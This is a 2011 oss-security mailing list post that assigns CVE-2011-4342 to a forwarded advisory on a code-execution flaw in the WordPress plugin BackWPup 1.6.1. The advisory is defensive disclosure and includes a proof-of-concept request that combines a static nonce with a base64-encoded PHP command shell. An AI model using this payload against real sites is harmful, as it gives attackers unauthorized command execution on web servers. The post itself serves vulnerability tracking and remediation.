'Re: [oss-security] Fwd: Wordpress plugin BackWPup Remote and Local'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] Fwd: Wordpress plugin BackWPup Remote and Local
From:       Kurt Seifried <kseifried () redhat ! com>
Date:       2011-11-22 19:55:11
Message-ID: 4ECBFE1F.2050506 () redhat ! com
[Download RAW message or body]

On 11/22/2011 03:07 AM, Henri Salo wrote:
> ----- Forwarded message from Lists <lists@senseofsecurity.com.au> -----
> 
> Date: Mon, 28 Mar 2011 15:10:39 +1100
> From: Lists <lists@senseofsecurity.com.au>
> To: lists@senseofsecurity.com.au
> Subject: [Full-disclosure] Wordpress plugin BackWPup Remote and Local Code
> 	Execution Vulnerability - SOS-11-003
> X-Mailer: Microsoft Outlook Express 6.00.3790.4657
> 
> Sense of Security - Security Advisory - SOS-11-003
> 
> Release Date.                  28-Mar-2011
> Last Update.                   -
> Vendor Notification Date.      25-Mar-2010
> Product.                       Wordpress Plugin BackWPup
> Platform.                      Independent
> Affected versions.             1.6.1 (verified), possibly others
> Severity Rating.               High
> Impact.                        System Access
> Attack Vector.                 Remote without authentication
> Solution Status.               Upgrade to version 1.7.1
> CVE reference.                 Not yet assigned
> 
> Details.
> A vulnerability has been discovered in the Wordpress plugin BackWPup 
> 1.6.1 which can be exploited to execute local or remote code on the web 
> server. The Input passed to the component "wp_xml_export.php" via the 
> "wpabs" variable allows the inclusion and execution of local or remote 
> PHP files as long as a "_nonce" value is known. The "_nonce" value 
> relies on a static constant which is not defined in the script meaning 
> that it defaults to the value "822728c8d9".
> 
> Proof of Concept.
> wp_xml_export.php?_nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ
> vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX           
> Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0   
> ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF
> sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d
> 
> Solution.
> Upgrade to version 1.7.1
> 
> Discovered by.
> Phil Taylor - Sense of Security Labs.
> 
> Sense of Security Pty Ltd
> Level 8, 66 King St
> Sydney NSW 2000
> AUSTRALIA
> T: +61 (0)2 9290 4444
> F: +61 (0)2 9290 4455
> W: http://www.senseofsecurity.com.au
> E: info@senseofsecurity.com.au
> Twitter: @ITsecurityAU
> 
> The latest version of this advisory can be found at:
> http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
> 
> Other Sense of Security advisories can be found at:
> http://www.senseofsecurity.com.au/research/it-security-advisories.php
> ----- End forwarded message -----
> 
> Can we assign CVE-identifier for this issue?

Please use CVE-2011-4342 for this issue.

> Original advisory: http://seclists.org/fulldisclosure/2011/Mar/328 / \
> http://www.senseofsecurity.com.au/advisories/SOS-11-003 Fixed in version: 1.7.2 \
> (http://wordpress.org/support/topic/plugin-backwpup-remote-and-local-codeexecution-vulnerability-sos-11-003)
>                 
> OSVDB: http://osvdb.org/show/osvdb/71481
> http://www.exploit-db.com/exploits/17056/
> 
> Best regards,
> Henri Salo


-- 

-Kurt Seifried / Red Hat Security Response Team


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic